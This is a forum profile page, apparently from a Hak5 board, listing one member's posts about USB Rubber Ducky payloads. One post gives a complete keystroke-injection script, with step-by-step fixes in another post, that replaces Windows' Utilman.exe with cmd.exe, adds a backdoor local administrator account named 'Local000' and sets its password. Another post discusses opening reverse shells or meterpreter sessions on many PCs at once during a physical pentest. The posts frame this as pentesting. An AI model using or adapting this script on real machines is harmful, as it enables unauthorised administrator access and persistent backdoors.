Jump to content

mackwage

Active Members
  • Posts

    17
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by mackwage

  1. I apologize if this seems like a dumb question. I am seeking to understand the benefit in having the duck emulate other USB devices. Would it execute the malicious script any differently?
  2. Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once as netcat cannot juggle multiple connections. Was trying to think if during a physical pentest, you could use the ducky on every pc in sight to set a meterpreter session back to your computer so you have a shell on all of them at once. Thoughts?
  3. In Windows, installing Java doesn't put it in your system32 folder so you have to refer to the Java folder for the Java.exe. Or at least that's how it is on both of my Windows machines.
  4. Thanks for the tip on the default delay. I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior. icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works which lead to me adding the last part. STRING xcopy cmd.exe util\ I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory. STRING cd /util STRING ren cmd.exe Utilman.exe STRING cd .. I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory. STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\ I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead. STRING rmdir /s /q util Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it. I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P
  5. Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command. DELAY 200 GUI r DELAY 50 STRING cmd DELAY 50 ENTER DELAY 50 STRING takeown /f "%systemroot%\System32\Utilman.exe" ENTER DELAY 50 STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T ENTER DELAY 50 STRING cd %systemroot%\System32 ENTER DELAY 50 STRING mkdir util ENTER STRING xcopy cmd.exe util\ ENTER DELAY 50 STRING ren Utilman.exe Utilman.exe.bak ENTER DELAY 50 STRING cd /util ENTER DELAY 50 STRING ren cmd.exe Utilman.exe ENTER DELAY 50 STRING cd .. ENTER DELAY 50 STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\ ENTER DELAY 50 STRING rmdir /s /q util ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI u STRING net user Local000 /add ENTER DELAY 50 STRING net localgroup administrators Local000 /add ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI r STRING cmd ENTER DELAY 50 STRING cd "%systemroot%\System32" ENTER DELAY 50 STRING delete Utilman.exe ENTER DELAY 50 STRING y ENTER DELAY 50 STRING ren Utilman.exe.bak Utilman.exe ENTER DELAY 50 STRING exit ENTER GUI r DELAY 500 STRING cmd DELAY 500 ENTER DELAY 200 STRING net user Local000 * ENTER STRING hak5 ENTER STRING hak5 ENTER STRING exit ENTER
  6. I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd then hit shift f10, it does the same behavior.
  7. I seem to have issues with the payload as is. The issue seems to be with the below lines: MENU STRING a ENTER I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue?
×
×
  • Create New...